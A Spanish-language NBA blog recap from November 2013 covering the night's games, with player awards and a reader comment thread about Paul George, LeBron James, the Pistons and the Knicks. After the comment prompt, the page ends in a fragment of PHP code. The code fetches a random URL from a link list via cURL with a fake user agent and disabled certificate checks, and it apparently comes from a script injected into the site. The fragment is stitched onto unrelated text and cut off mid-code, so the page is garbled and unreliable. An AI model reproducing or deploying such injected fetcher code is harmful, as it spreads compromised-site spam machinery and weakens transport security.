La Crónica: Los únicos invictos

06 de November de 2013 por txusma

Especulábamos no hace mucho en el blog sobre quiénes eran los justos MVPs de lo que va de competición. En este punto hemos cometido un imperdonable olvido dejando fuera del debate al mejor jugador del mejor equipo de lo que va de curso, Paul George. Anoche volvió a ser determinante para que los Pacers lograra la victoria en una plaza tan complicada como es ahora mismo Detroit. El primer tiempo acabó igualado merced a un gran segundo cuarto de los locales pero al inicio de la segunda parte, Indiana se puso las pilas y consiguió una ventaja de unos 10 puntos que aguantó hasta el final (99-91).

Hablando de candidatos, los Heat prevalecieron en Toronto con otra actuación soberbia de King James que se convirtió en el quinto jugador de la historia en anotar más de 10 puntos en 500 partidos consecutivos. Los Raptors plantaron cara de la mano de Valanciunas y DeRozan pero al final del tercer cuarto cedieron una ventaja que ya no pudieron recuperar (104-95). Spurs y Nets ganaron sin grandes problemas a equipos que aún no han sido capaces de obtener ninguna victoria. San Antonio se impuso a los Nuggets a pesar de llegar a perder de 13 puntos. Los de Popovich tiraron de veteranía y con una gran defensa obligaron a los jugadores de Denver a cometer muchos errores en un último cuarto que empezaron por detrás (102-94).  Por su parte, los Nets no dieron opción a los Jazz. Desde el primer cuarto, Brook Lopez causó estragos en la zona rival y la victoria fue más fácil de lo esperada (88-104). Los Rockets destrozaron a los Blazers de la mano de un inmenso Dwight Howard (116-101) y habrá que empezar a tomar en serio a Dallas, que trituró a Lakers con una extraordinaria actuación de Monta Ellis (104-123). En cambio, Tyson Chandler se lesionó en el primer cuarto del Charlotte – Knicks, y los de New York acabaron perdiendo a pesar de que Al Jefferson sigue de baja.   Cuidado que el ambiente comienza a estar extremadamente enrarecido en la Gran Manzana (102-97).

Finalmente, los Hawks no tuvieron excesivos problemas llevándose la victoria de Sacramento (105-100) y los Suns lograron una meritoria victoria en New Orleans (104-98). A estos alguien deberá también explicarles como se tanquea.

PREMIOS

MVP:  Brutales actuaciones de Lebron James y Paul George que parecen retarse desde ya mismo para la final de conferencia. El de Miami se fue a los 35 puntos, 8 rebots y 8 asistencias mientras que el de los Pacers nos deleitó con 31 puntos, 10 rebotes, 4 asistencias y 4 robos.

Rookie: Cody Zeller anotó 7 puntos y capturó 5 rebotes en la victoria de los Bobcats en NY, Dennis Schroeder consiguió 6 puntos y 7 asistencias pero el mejor rookie del día fue Ben McLemore con 15 puntos y 6 rebotes.

Sorpresa: Monta Ellis emergió con una serie en el tiro de 11 de 14, algo bastante impropio de él. Acabó con 30 puntos y 9 asistencias. Paul Millsap también cuajó un partido redondo con 25 puntos, 11 rebotes, 4 asistencias y 4 robos. En Phoenix, esta vez la sorpresa la dio Marcus Morris con 17 puntos, 5 rebotes y 4 asistencias.

Decepción: Mal día para Derrick Favors que fue completamente dominado por Brook Lopez. Acabó el partido con 6 puntos y 5 rebotes.

Esfuerzo en vano: Isaiah Thomas dio la cara ante los Hawks con 26 puntos y 5 asistencias. Enes Kanter y Gordon Hayward fue lo único que funcionó en Utah, 21 puntos y 8 rebotes para el primero y 22 puntos, 5 rebotes y 4 asistencias para el segundo.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Buenos días,

    Vaya tela con los Pacers, y sobretodo con George, que parece que puede coger el relevo a Durant en el duelo diario con LeBron para ver quien es el jugador de la jornada. Aunque el de los Thunder también ha empezado bastante bien la temporada, todo sea dicho.

    Paul George me recuerda bastante a Mcgrady, aunque este último me parecía algo mejor técnicamente. Pero bueno, George aún tiene bastante margen de mejora, y si lo aprovecha como hasta ahora quien sabe donde puede llegar el chaval.

    Ellis y Bledsoe han empezado a nivel All-Star, y si el escolta de los Mavs mantiene el nivel, ojo con los de Dallas
    .

      Citar

  2. Esteban dice:
    #2

    george solo tiene de McGrady la altura y la elasticidad, en el resto son completamente diferentes
    George es un prodigio en defensa, tremendo reboteador y asistente, y es algo limitado en ataque, salvo por contragolpes o un cada vez mas certero tiro de 3 puntos

    McGrady era un anotador puro, con todos los recursos del mundo y debil en todas las otras facetas del juego

      Citar

  3. Luis H. dice:
    #3

    Partido curioso de los dos hermanos Morris. 17-5-4 Markieff y 16-9 Marcus, ojalá se asienten porque hacen buena pareja. A Len todavía no le han dado mucha cancha. Van a ser un equipo interesante los Suns al final, les falta coger un par de buenas piezas en el exterior que aporten consistentemente puntos

      Citar

  4. Laker1624 dice:
    #4

    Pues a mi parecer Mcgrady era un jugador bastante completo, y yo no diría que George es un “tremendo asistente”, vale que el tío tiene buenos números en asistencias y es un jugador completo, pero no es un grandísimo pasador.

    Cierto que el juego ofensivo de George es mas físico que técnico, pero me parece que Mcgrady no llego a la liga siendo un prodigio en cuanto a recursos ofensivos, luego la historia ya cambio (como puede pasar con George), y eso le valió al bueno de Tracy para llevarse el MIP (igual que George).

      Citar

  5. GreenPride dice:
    #5

    Siguen sorprendiendo los Suns y decepcionando los Knicks. Yo no le tengo mucha fe al equipo de la gran manzana este año pero para estar 1-3 tampoco.
    De lo demás el rey empieza a marcar las diferencias en cada partido y Paul George llama a la puerta del estrellato al mas alto nivel. Indiana da miedo con un equipo mejorado y aún a la espera de un gran tirador como Danny Green. Impresionante el incio el inicio de campaña de Lance Stepehenson. Y esta noche reciben a los Bulls, en un partido con claro pronóstico a favor de los Pacers ahora mismo.
    Houston volvió a la senda de la victoria y esta vez Superman sí fue lo que se espera de él. Y los Lakers, pues con Pau y Nash a este nivel no tienen equipo para nada. No confío en Dallas a pesar de su inicio pues no creo que Ellis mantenga este nivel, vamos algo parecido a lo que les pasó el año pasado con OJ Mayo,.

      Citar

  6. Esteban dice:
    #6

    GreenPride:
    Indiana da miedo con un equipo mejorado y aún a la espera de un gran tirador como Danny Green.

    Danny Granger

      Citar

  7. Esteban dice:
    #7

    increible hibbert dominando la zona frente a drummond, monroe y smith

    una leccion para el joven andre, el futuro todavia no es hoy

      Citar

  8. Ruxixón dice:
    #8

    Esteban:
    increible hibbert dominando la zona frente a drummond, monroe y smith

    una leccion para el joven andre, el futuro todavia no es hoy

    Con el bueno de Hibbert se han pasado un poco,hace nada era un tio sin sangre y ahora el tio poco más y parece de la escuela de Ron Artest (sin llegar a arrear pero se pica con los rivales,se automotiva,etc).Me gusta Detroit la verdad,pero deberían incorporar a Caldwell Pope a la rotación para solucionar algo la falta de tiro exterior,mismamente por Stuckey que en el último cuarto se ha creido jugador franquicia y ha tomado decisiones horribles de irse él solo contra el mundo.

    Lei en twitter que los 32 puntos del quinteto Laker es la peor marca de anotación de la historia de la franquicia,dato bastante triste la verdad.

      Citar

  9. Laker1624 dice:
    #9

    Lei en twitter que los 32 puntos del quinteto Laker es la peor marca de anotación de la historia de la franquicia,dato bastante triste la verdad.

    Y creo que es la primera vez desde hace unos 35 años que ninguno de los titulares supera los 10 puntos…

      Citar

  10. Laker1624 dice:
    #10

    Para ser mas concretos:

    “De hecho, exceptuando a Pau Gasol, ninguno de esos titulares llegó a los 10 puntos. Es la primera vez en la historia de la NBA desde 1976/77 que ningún jugador titular de los angelinos pasa de esos 10 tantos. También fue la primera ocasión en la que la suma de los puntos logrados por ellos era sólo de 32 puntos.”

    Sacado de Nbamaniacs.

      Citar

  11. rumbero dice:
    #11

    Pues Chandler va a estar entre 4 y 6 semanas de baja por fractura en el peroné, aunque dentro de lo malo no tendrá que pasar por quirófano. La pintura de los Knicks en serios apuros y encima habiendo empezado mal

      Citar

  12. Denise dice:
    #12

    GreenPride:
    No confío en Dallas a pesar de su inicio pues no creo que Ellis mantenga este nivel, vamos algo parecido a lo que les pasó el año pasado con OJ Mayo,.

    Yo estoy contigo, creo que el nivel de Dallas hasta ahora es bastante engañoso. Sus 3 victorias han sido en casa, 2 de ellas ante rivales que segun mi lista no van a oler Playoffs como los Hawks y los Lakers. La otra un poco mas meritoria ante los Grizzlies, aunque no veo a los ositos tan peleones como en los años anteriores.
    No sé, para confiar en Dallas, tendría que verlos ganar un par de partidos seguidos fuera de casa a equipos aspirantes al anillo.

      Citar

  13. Viva_Dirk dice:
    #13

    Vi el Pacers-Pistons y creo que Detroit tiene mal configurada la plantilla. Josh Smith está muy implicado y junto a la pareja interior debe marcar muchas diferencias, pero para que funcionen necesitan jugar con gente con mas cerebro, Jennings, Stuckey o Will Bynum son un desastre como directores y ni si quiera son tiradores fiables. Con esto las defensas se cierran y no hay un dios que anote. Billups ya no puede aportar todo lo que necesitan de el y sólo Singler parece jugar con sentido común del resto de exteriores.

    Los Pacers son un pedazo de equipo, su pelea va a ser ajustar en las series de playoffs.

    Para acabar, sigue siendo mucho más ofensivo el juego en el oeste, no?

      Citar

  14. Blade Petrovic dice:
    #14

    No soy ningún experto, pero no hace falta serlo para saber que el juego interior de los Pistons, y los Pistons en general, cuando se les ponga un buen equipo a defender muy bien a su frontcourt se pierden. El parcial del inicio del tercer cuarto viene por eso. Mala toma de decisiones por part de Monroe y Smith, que fallan en el ataque y noi completan la transición defensiva, lo que hace que el ataque acabe en canastas fáciles, una un triple de Stephenson. Necesitan en contrar alternativas con su juego exterior, sino los Pacers o los Bulls, se los van a comer.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>